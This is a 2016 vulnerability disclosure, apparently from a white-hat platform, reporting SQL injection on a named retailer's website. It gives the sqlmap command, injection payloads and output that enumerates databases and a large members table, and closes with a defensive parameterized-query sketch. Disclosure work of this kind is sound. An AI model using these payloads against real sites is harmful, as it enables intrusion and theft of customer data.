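2016-03-09: Details reported to the vendor; awaiting vendor handling
2016-03-10: Vendor confirmed; details disclosed to the vendor only
2016-03-20: Details disclosed to core white hats and experts in related fields
2016-03-30: Details disclosed to regular white hats
2016-04-09: Details disclosed to intern white hats
2016-04-24: Details disclosed to the public
As the title says. Yesterday I saw a Laiyifen injection get handled through the major-vendor process, so I dug one up too. It's right on the main site. Requesting a front-page spot.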
python sqlmap.py -u "http://www.laiyifen.com/index.php/article*-zhifufangshi*_huodaofukuan*-lists*-11**.html" --dbs
Parameter: #5* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.laiyifen.com:80/index.php/article-zhifufangshi_huodaofukuan-lists-11" AND (SELECT 3099 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(3099=3099,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "KCUu"="KCUu.html

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-zhifufangshi_huodaofukuan-lists-11" AND SLEEP(5) AND "vpCf"="vpCf.html
---
[13:01:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0
[13:01:06] [INFO] fetching database names
[13:01:07] [INFO] the SQL query used returns 3 entries
[13:01:08] [INFO] retrieved: information_schema
[13:01:09] [INFO] retrieved: laiyifendb
[13:01:09] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] laiyifendb
[*] test

[13:04:12] [INFO] the back-end DBMS is MySQL
[13:04:12] [INFO] fetching banner
[13:04:12] [INFO] resumed: 5.1.59 - ShopEX-MySQL-log
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0
banner: '5.1.59 - ShopEX-MySQL-log'
[13:04:12] [INFO] fetching current user
[13:04:12] [INFO] resumed: laiyifendb@10.%.%.%
current user: 'laiyifendb@10.%.%.%'
[13:04:12] [INFO] fetching current database
[13:04:12] [INFO] resumed: laiyifendb
current database: 'laiyifendb'
[13:04:12] [INFO] fetching server hostname
[13:04:12] [INFO] resumed: db1
hostname: 'db1'
[13:04:12] [INFO] testing if current user is DBA
[13:04:12] [INFO] fetching current user
current user is DBA: False
[13:04:13] [INFO] fetching database users
[13:04:13] [INFO] the SQL query used returns 1 entries
[13:04:13] [INFO] resumed: 'laiyifendb'@'10.%.%.%'
database management system users [1]:
[*] 'laiyifendb'@'10.%.%.%'
[20:17:05] [INFO] fetching entries for table 'sdb_b2c_members' in database 'laiyifendb'
[20:17:08] [INFO] the SQL query used returns 4912874 entries
Filter
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-03-10 11:39
Thank you very much for your support; let's work together to do this well!
None yet
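
The report's suggested fix is filtering. The sketch below is an added example, not code from the affected site or from ShopEX: it shows the defensive pattern for a rewritten URL like the one in the report, with strict allow-list parsing of the path followed by a bound-parameter query. The route shape, table, column names and sample row are assumptions constructed for illustration, and sqlite3 stands in for MySQL.

```python
import re
import sqlite3

# Assumed route shape, modelled on the URL in the report:
#   /index.php/article-<slug>-lists-<numeric id>.html
ROUTE = re.compile(r"/index\.php/article-([a-z0-9_]{1,64})-lists-([0-9]{1,9})\.html")


def parse_route(path):
    """Return (slug, article_id), or None unless the whole path is well-formed."""
    # fullmatch, not match/search: trailing text after the id must not pass.
    m = ROUTE.fullmatch(path)
    if m is None:
        return None
    return m.group(1), int(m.group(2))


def make_db():
    """Constructed one-row table standing in for the article store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, slug TEXT, title TEXT)")
    db.execute("INSERT INTO articles VALUES (11, 'zhifufangshi_huodaofukuan', 'Cash on delivery')")
    return db


def lookup(db, path):
    """Validate first, then query with bound parameters only."""
    route = parse_route(path)
    if route is None:
        return 400, None  # reject; never try to 'clean' the value
    slug, article_id = route
    row = db.execute(
        "SELECT title FROM articles WHERE id = ? AND slug = ?",
        (article_id, slug),
    ).fetchone()
    return (200, row[0]) if row else (404, None)


if __name__ == "__main__":
    db = make_db()
    base = "/index.php/article-zhifufangshi_huodaofukuan-lists-11"
    # Second path is the time-based payload quoted in the report above.
    for p in (base + ".html", base + '" AND SLEEP(5) AND "vpCf"="vpCf.html'):
        print(lookup(db, p)[0], p)
```

Rejecting malformed paths with a 400 rather than stripping characters keeps the query input to a known-good grammar, and the bound parameters mean a future loosening of the pattern still cannot alter the SQL statement.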